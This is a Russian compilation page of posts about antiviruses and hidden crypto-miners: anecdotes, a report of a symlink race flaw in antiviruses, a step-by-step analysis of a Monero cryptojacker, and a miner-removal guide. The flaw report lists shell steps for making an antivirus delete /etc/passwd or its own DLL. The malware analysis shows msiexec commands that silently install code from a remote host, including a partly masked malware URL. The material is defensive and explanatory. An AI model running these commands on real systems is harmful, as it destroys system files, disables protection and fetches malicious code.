Может мой способ не самый лучший, но я всё равно хочу его опубликовать, мало ли кому поможет.

Типичный фейл⁠ ⁠

Было это когда вирус баннер прям поголовно был, ну убирать его не было сложно. Предлагал клиентам ставить касперского лицензию. Покупал оптом, ну и по одному продавал)).

Поставил очередному клиенту и заверил что с антивирусной защитой баннер он не словит. Проходит неделя, звонит, пыхтит, недовольный аж прям. Верните деньги, я опять баннер поймал. Мой вердикт, везите. Привозит значит системный блок. Баннер сперва убираю , а он рядом стоит, смотрит и тыкает меня, вот видите, видите, деньги верните.

Ну не может так быть что бы антивирус пропустил. Смотрю на значок Касперского а он серый (значит защита выключена, да не просто, а вручную). Тааак, спрашиваю, почему Касперский выключен, вы его отключали? Тык, мык, я не, да ну может быть. а он мне не давал на сайт 18+ зайти. Я говорю, на котором и впаймали баннер? Глаза опустил. Не мой косяк, с вас 500р. за удаления баннера. Занавес.

Kaspersky: Начало⁠ ⁠

Kaspersky: Начало Антивирус, Майнеры, Комментарии на Пикабу

Ответ на пост «Как я скрытый майнер искал»⁠ ⁠

Есть такая классная встроенная в винду штука — монитор ресурсов. Там есть первая вкладка «Обзор». Так вот, ее «классность» в том, что в отличии от диспетчера задач она продолжает показывать завершенные процессы, статус у них «Прерван». У меня эта штука постоянно открыта. Если слышу, что ноут загудел — смотрю в первую очередь в прерванные процессы. Там, как правило тусят виндовые «бекграунд таск» хост процессы, которые винда быстро прибивает как только видит активность пользователя. Как собсно майнеры и делают. 😉

Ответ на пост «Как я скрытый майнер искал» Майнеры, Ответ на пост, Компьютерный вирус

Большинство антивирусов оказались подвержены атаке через символические ссылки⁠ ⁠

Большинство антивирусов оказались подвержены атаке через символические ссылки Антивирус, Mac Os, Windows, Linux, Длиннопост

Исследователи из компании RACK911 Labs обратили внимание на то, что почти все антивирусные пакеты для Windows, Linux и macOS были уязвимы для атак, манипулирующих состоянием гонки (race conditions) во время удаления файлов, в которых обнаружено вредоносное ПО.

Для проведения атаки необходимо загрузить файл, который антивирус распознает как вредоносный (например, можно использовать тестовую сигнатуру), а через определённое время, после выявления вредоносного файла антивирусом, но непосредственно перед вызовом функции для его удаления, подменить каталог с файлом символической ссылкой. В Windows для достижения того же эффекта выполняется подмена каталога при помощи точки соединения (directory junction). Проблема в том, почти все антивирусы должным образом не выполняли проверку символических ссылок и, считая что удаляют вредоносный файл, удаляли файл в каталоге на который указывает символическая ссылка.

В Linux и macOS показано как таким способом непривилегированный пользователь может удалить /etc/passwd или любой другой системный файл, а в Windows DDL-библиотеку самого антивируса для блокирования его работы (в Windows атака ограничена только удалением файлов, которые в текущим момент не используются другими приложениями). Например, атакующий может создать каталог «exploit» и загрузить в него файл EpSecApiLib.dll с тестовой сигнатурой вируса, после чего перед удалением заменить каталог «exploit» на ссылку «C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform», что приведёт к удалению библиотеки EpSecApiLib.dll из каталога антивируса. В Linux и macos аналогичный приём можно проделать с подменой каталога на ссылку «/etc».

rm -rf /home/user/exploit ; mkdir /home/user/exploit/

while inotifywait -m “/home/user/exploit/passwd” | grep -m 5 “OPEN”

rm -rf /home/user/exploit ; ln -s /etc /home/user/exploit

Более того, во многих антивирусах для Linux и macOS было выявлено использование предсказуемых имён файлов при работе с временным файлами в каталоге /tmp и /private/tmp, что могло использоваться для повышения привилегий до пользователя root.

К настоящему времени проблемы уже устранены большинством поставщиков, но примечательно, что первые уведомления о проблеме были направлены производителям ещё осенью 2018 года. Несмотря на то, что не все производители выпустили обновления, им было дано на исправление как минимум 6 месяцев, и RACK911 Labs считает, что теперь вправе раскрыть сведения об уязвимостях. Отмечается, что компания RACK911 Labs давно занимается работой по выявлению уязвимостей, но она не предполагала, что с коллегами из антивирусной индустрии будет так трудно работать из-за затягивания выпуска обновлений и игнорирования необходимости срочного устранения проблем с безопасностью.

Продукты, подверженные проблеме (свободный антивирусный пакет ClamAV в списке отсутствует):

Comodo Endpoint Security

Eset File Server Security

F-Secure Linux Security

Kaspersy Endpoint Security

McAfee Endpoint Security

Sophos Anti-Virus for Linux

Avast Free Anti-Virus

Avira Free Anti-Virus

Comodo Endpoint Security

F-Secure Computer Protection

FireEye Endpoint Security

Intercept X (Sophos)

Kaspersky Endpoint Security

Malwarebytes for Windows

McAfee Endpoint Security

Webroot Secure Anywhere

BitDefender Total Security

Eset Cyber Security

Kaspersky Internet Security

McAfee Total Protection

Microsoft Defender (BETA)

Webroot Secure Anywhere

Криптоджекинг. Разбор случайного вируса-майнера под Windows.⁠ ⁠

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство «мастеров», думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker’ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ — открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В автозагрузке, повторюсь всё в порядке:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов — ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует «Планировщик заданий» (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Дальше я стал копать и выяснил, что бирюзовое окно — это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива — всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это — файл инсталлятора чего-либо:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, как оказалось, программа никаких файлов в себе не содержала — только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal’е, и получил следующий результат:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю — скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз — да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом — если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково — обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется «Info-Zip UnZip», и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик — что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает — распаковываются файлы только оригинальным UnZip’ом при помощи этой команды.
Все файлы внутри архива — исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Этот файл представляет собой json — конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету «Monero». Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера «****Rig»:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую «работу», и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом — никаких окон).

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

Поиск и удаление майнера в Windows 10

как удалить майнер с компьютера windows 10

Для начала рекомендуется проверить, есть ли на компьютере вредоносное ПО. Существует несколько признаков, которые указывают на то, что происходит майнинг криптовалюты без согласия пользователя. Причем эти процессы губительно влияют на работу аппаратных компонентов устройства, а также замедляет производительность системы.

В первую очередь закройте все приложения и браузер, затем проверьте загруженность компонентов через «Диспетчер задач». Посмотрите данные на вкладке «Процессы», чтобы понять, насколько активно работает видеокарта, центральный процессор, жесткий диск и оперативная память.

как удалить майнер с компьютера windows 10-1

Читайте также: Методы запуска «Диспетчера задач» в Windows 10

В течение нескольких минут понаблюдайте за активностью процессов в режиме полного бездействия. Если даже в этом случае «железо» сильно нагружается, то, скорее всего, работает майнер.

При этом обратите внимание на то, что нагрузку на видеокарту отображают только новые версии «Диспетчера задач», доступные в Windows 10 и Windows 11. Многие майнеры как раз задействуют это комплектующее для проведения транзакций или создания новых блоков, значит, в старых ОС через штатное средство можно пропустить активность вредоносной программы и подумать, что она отсутствует. К тому же злоумышленники не стоят на месте и не зря скрытые майнеры называются «скрытыми». Они могут завершать свое действие при открытии «Диспетчера задач». Мы бы рекомендовали осуществлять проверку нагрузки на комплектующие при помощи сторонних мониторов, лучшим из которых является Process Explorer.

Как удалить майнер с компьютера Windows 10-001

    Можете не беспокоиться о безопасности Process Explorer, поскольку данная программа была разработана одним из сотрудников Microsoft и сейчас распространяется бесплатно на официальном сайте с документацией. Собственно, туда и нужно перейти, чтобы найти кнопку «Download Process Explorer» и скачать ПО на свой компьютер.

Lumpics.ru

Дополнительно обратим внимание тех пользователей, кто думает, что какая-то игра, скачанная из неофициальных источников, может запускать скрытый майнер на вашем компьютере. Проверка такого типа заражения производится еще одним методом. Сначала понадобится найти системные требования игры и сравнить их со своими комплектующими, оценив, какая производительность должна быть при ее запуске. Сделать это можно как в официальных магазинах игр, так и на сторонних сайтах.

Как удалить майнер с компьютера Windows 10-0015

Следующий этап — определение нагрузки на железо во время самой игры. Осуществляется это при помощи любой программы для мониторинга системы в играх. Если видеокарта или процессор необоснованно нагружены на 100%, например в слабых играх, которые должны «летать» на вашей сборке, стоит задуматься о том, не используется ли вместе с игрой скрытый майнер. О его обнаружении мы и поговорим далее.

Способ 1: Антивирусные программы

Один из наиболее эффективных методов избавиться от майнера – это использование специальных программ для удаления вирусов с компьютера. Как правило, антивирусы принимают майнинговый софт за вредоносный и избавляются от него таким же образом, как и от обычных вирусов. В нашем отдельном материале описаны все способы проверки и удаления вредоносного ПО с помощью сторонних и встроенных средств, а также для профилактики.

как удалить майнер с компьютера windows 10-02

Подробнее: Борьба с компьютерными вирусами

После того как проверка на вирусы с помощью специализированного софта завершена, рекомендуется очистить реестр системы, поскольку деятельность майнера могла вызвать различные системные ошибки, которые необходимо исправить для стабильной работы Windows 10. Обычно для этих целей используются отдельные приложения, о которых более подробно написано в нашей отдельной статье.

как удалить майнер с компьютера windows 10-03

Подробнее: Как очистить реестр Windows от ошибок

В некоторых случаях и стандартный Защитник Windows тоже может оказаться полезным. Относится это как раз к тем играм, которые были скачаны их сторонних источников. Если они нелицензионные, антивирус и так в большинстве найдет какие-то угрозы, воспринимая их за трояны или другие типы вирусов. Однако нас интересует не это, а какие именно файлы он посчитает вирусами. Возможно, какой-то из них и является скрытым майнером, а не модифицированной библиотекой, которая нужна для запуска игры. Осуществляется такая проверка следующим образом:

  1. Найдите корневой каталог с этой нелицензионной игрой и щелкните по нему правой кнопкой мыши. Из контекстного меню выберите пункт «Проверка с использованием Microsoft Defender». Как удалить майнер с компьютера Windows 10-0011
  2. Проверка начинается сразу же, поэтому вам остается только ожидать ее завершения. Как удалить майнер с компьютера Windows 10-0012
  3. Если угрозы были найдены, вы будете уведомлены об этом и сможете перейти в раздел «Все недавние элементы». Посмотрите детальную информацию о файле, тип угрозы и действие, которое Защитник выполнил автоматически (если потом окажется, что это не скрытый майнер, можно задать параметр игнорирования угрозы). Как удалить майнер с компьютера Windows 10-0013
  4. Самая важная информация — название зараженного файла. Скопируйте или запомните его, после чего осуществите поиск в интернете или запустите игру и посмотрите, будет ли создан процесс, связанный именно с этой библиотекой, и нагрузит ли он видеокарту либо процессор. Как удалить майнер с компьютера Windows 10-0014

Способ 2: «Диспетчер задач»

Еще один способ избавиться от майнера в Windows 10 – это самостоятельно определить подозрительный процесс, затем очистить все данные, связанные с ним, в «Редакторе реестра». Однако это непростая задача, требующая от пользователя внимательности и уверенности в том, что он делает. В противном случае из реестра можно удалить что-то важное, нарушив работу Windows. Рекомендуется выполнять все точно по инструкции, чтобы избежать нестабильной работы операционной системы, а также обратиться к данному варианту, если другие способы из статьи не оказали должного эффекта и проблема не была устранена:

как удалить майнер с компьютера windows 10-04

  1. Запустите «Диспетчер задач». На вкладке «Подробности» найдите процесс, который больше всех остальных нагружает систему. Для упорядочивания по степени загрузки нажмите на вкладку «ЦП», чтобы узнать нагрузку на процессор, или «Память» для определения загруженности ОЗУ. Важно проверять в интернете предназначение каждого процесса (ищите по его названию), чтобы случайно не избавиться от важного системного процесса. Обычно в названиях майнеров присутствует множество различных непонятных символов.
  2. Когда подозрительный процесс оказался найден, скопируйте его название, затем создайте точку восстановления системы, чтобы можно было вернуть исходное состояние, если допустите ошибку при выполнении следующих шагов.

После процедуры потребуется перезагрузить систему. Если теперь с нагрузкой ПК все в порядке, что можно проверить через «Диспетчер задач», значит, действия выполнены верно. В противном случае откатите систему до исходного состояния, используя созданную в Шаге 3 точку восстановления.

Допустим, через «Диспетчер задач» не удалось найти подозрительный процесс и отследить его активность. В таком случае снова поможет Process Explorer, о взаимодействии с которым уже было сказано выше. Если вы обнаружили подозрительные задачи, которые нагружают процессор или видеокарту, можно оперативно перейти к их поиску через интернет. Для этого в самом мониторе щелкните по процессу правой кнопкой мыши и из контекстного меню выберите пункт «Search Online».

Как удалить майнер с компьютера Windows 10-0010

Ознакомьтесь с выдачей в браузере, чтобы понять предназначение этого процесса и уровень его безопасности. Если окажется, что это действительно скрытый майнер, понадобится выполнить действия для его удаления. Скорее всего, сайт, на котором вы найдете информацию о данном вредоносном ПО, предоставит сведения о пути его нахождения или записи в реестре, которая отвечает за запуск майнера. Все это придется найти и удалить, а затем еще раз запустить CCleaner или используемый антивирус. Соответственно, программу или игру, которая была связана с этим скрытым майнером, тоже лучше удалить, иначе процесс вместе с файлом может создаться заново.

Способ 3: Защита от браузерного майнинга

Важно уметь защитить свой компьютер, в том числе и браузер, от майнеров, и для этого существует несколько способов, о которых мы расскажем далее. А по ссылке ниже вы сможете прочитать инструкцию в ситуации, когда подозреваете, что майнер уже есть в веб-обозревателе. Если при его использовании компьютер начинает виснуть и тормозить, есть вероятность того, что кто-то неправомерно добывает криптовалюту через браузер.

Вариант 1: Отключение JavaScript

Отключение JavaScript — очень спорный момент. С одной стороны, это рекомендуется делать в целях безопасности, но с другой – появится проблема с открытием некоторых сайтов или запуском различных сценариев. Однако если вы периодически посещаете сомнительные в плане безопасности сайты, можете на время выключать данную функцию, активируя ее обратно для привычного интернет-серфинга. На примере Яндекс.Браузера разберем, как отключить JavaScript:

  1. Нажмите на три горизонтальные полоски на верхней панели и из меню выберите пункт «Настройки». как удалить майнер с компьютера windows 10-10
  2. На вкладке «Сайты» найдите строку «Расширенные настройки сайтов» и нажмите на нее. как удалить майнер с компьютера windows 10-11
  3. В блоке «JavaScript» задайте значение «Запрещен». как удалить майнер с компьютера windows 10-12

Принцип действия в различных браузерах может отличаться, но в большинстве обозревателей реализована поисковая строка в настройках, что позволит быстро отыскать параметр.

Вариант 2: Расширение для браузера

Для безопасности пребывания в сети рекомендуется устанавливать специальные расширения, которые блокируют подозрительные ссылки и назойливую рекламу. Например, такие популярные дополнения, как AdBlock Plus или uBlock Origin предусматривают в списке фильтров сервера, к которым обращаются криптомайнеры. Кроме того, если вы не против смотреть рекламу и поддерживать используемые сайты, всегда можете настроить белый список — в результате этого действие расширения будет отключаться каждый раз, когда вы заходите на доверенный интернет-ресурс.

Существуют специальные расширения, которые предназначены для блокировки майнеров в браузере, причем разработчики регулярно и оперативно обновляют базу запрещенных скриптов, использующих ресурсы ПК для добычи криптовалюты. К таким дополнениям относится MinerBlock, который доступен для бесплатного скачивания в интернет-магазине Google Store.

  1. Достаточно нажать на кнопку установки и подтвердить действие во всплывающем окне. После инсталляции он автоматически начинает работу, защищая браузер от майнера. Доступны настройки расширения, а также возможность добавлять сайты в исключения. как удалить майнер с компьютера windows 10-13
  2. Чтобы отключить работу расширения, нажмите на его иконку на верхней панели, затем воспользуйтесь кнопкой «Disable Blocker». как удалить майнер с компьютера windows 10-14

Вариант 3: Специализированный софт

Специальное приложение Anti-WebMiner работает с файлами hosts, блокируя различные сценарии веб-майнинга. Если к домену обращаются такие скрипты, оно перенаправляет их. Когда программа закрывается, изменения удаляются, возвращая состояние файлов к изначальному.

  1. Скачайте и установите программу. В главном окне нажмите на кнопку «Protect», которая запускает работу блокировщика. После этого можно посещать любые сайты в интернете. Если ресурс окажется подозрительным, то утилита заблокирует доступ к нему. как удалить майнер с компьютера windows 10-15
  2. Для завершения работы программы достаточно кликнуть по кнопку «UnProtect» внизу или закрыть окно. как удалить майнер с компьютера windows 10-16

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *